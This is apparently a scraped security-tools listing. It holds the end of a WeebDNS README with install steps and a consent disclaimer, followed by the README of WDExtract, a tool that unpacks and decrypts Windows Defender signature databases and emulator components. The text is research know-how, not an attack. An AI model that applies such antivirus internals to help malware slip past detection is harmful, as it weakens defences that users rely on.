$ sudo pip3 install -r requirements.txt
$ python3 weebdns.py

Bugs and enhancements
For bug reports or enhancements, please open an issue here.

This is the official and only repository of the WeebDNS project.
Written by: FuzzyRabbit - Twitter: @rabbit_fuzzy, GitHub: @FuzzyRabbit
DISCLAIMER: This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes, period.
Please read the LICENSE for the licensing of WeebDNS.


WDExtract - Extract Windows Defender Database From Vdm Files And Unpack It


Extract Windows Defender database from vdm files and unpack it
  • This program is distributed as-is, without any warranty;
  • No official support; if you like this tool, feel free to contribute.

Features
  • Unpack VDM containers of Windows Defender/Microsoft Security Essentials;
  • Decrypt VDM container embedded in the Malicious Software Removal Tool (MRT.exe);
  • Extract all PE images from unpacked/decrypted containers on the fly (-e switch):
    • dump VDLLs (Virtual DLLs);
    • dump VFS (Virtual File System) contents;
    • dump signatures auxiliary images;
    • dump GAPA (Generic Application Level Protocol Analyzer) images used by NIS (Network Inspection System);
    • code can be adapted to dump type specific chunks of database (not implemented);
  • Faster than any script.
List of MRT extracted images, (version 5.71.15840.1) https://gist.githubusercontent.com/hfiref0x/e4b97fb7135c9a6f9f0787c07da0a99d/raw/d91e77f71aa96bdb98d121b1d915dc697ce85e2a/gistfile1.txt
List of WD extracted images, mpasbase.vdm (version 1.291.0.0) https://gist.githubusercontent.com/hfiref0x/38e7845304d10c284220461c86491bdf/raw/39c999e59ff2a924932fe6db811555161596b4a7/gistfile1.txt
List of NIS signatures from NisBase.vdm (version 119.0.0.0) https://gist.githubusercontent.com/hfiref0x/e9b3f185032fcd2afb31afe7bc9a05bd/raw/9bd9f9cc7c408acaff7b56b810c8597756d55d14/nis_sig.txt

Usage
wdextract file [-e]
  • file - filename of the VDM container (*.vdm file or MRT.exe executable);
  • -e - optional parameter; extracts all PE image chunks found in the VDM after unpacking/decrypting (this includes VFS components and emulator VDLLs).
Example:
  • wdextract c:\wdbase\mpasbase.vdm
  • wdextract c:\wdbase\mpasbase.vdm -e
  • wdextract c:\wdbase\mrt.exe
  • wdextract c:\wdbase\mrt.exe -e
Note: the base will be unpacked/decrypted to the source directory as %originalname%.extracted (e.g. if the original file is c:\wdbase\mpasbase.vdm, the unpacked file will be c:\wdbase\mpasbase.vdm.extracted). Image chunks will be dumped to a "chunks" directory created under wdextract's current directory (e.g. if wdextract is run from c:\wdbase, it will be c:\wdbase\chunks). Output files always overwrite existing ones.

Build
  • Source code written in C;
  • Built with MSVS 2017 with Windows SDK 17763 installed;
  • Can be built with previous versions of MSVS and SDKs.

Related references and tools

N.B.
No actual dumped/extracted/unpacked binary data is included or will be included in this repository.

3rd party code usage
Uses ZLIB Data Compression Library (https://github.com/madler/zlib)

Authors
(c) 2019 WDEXTRACT Project

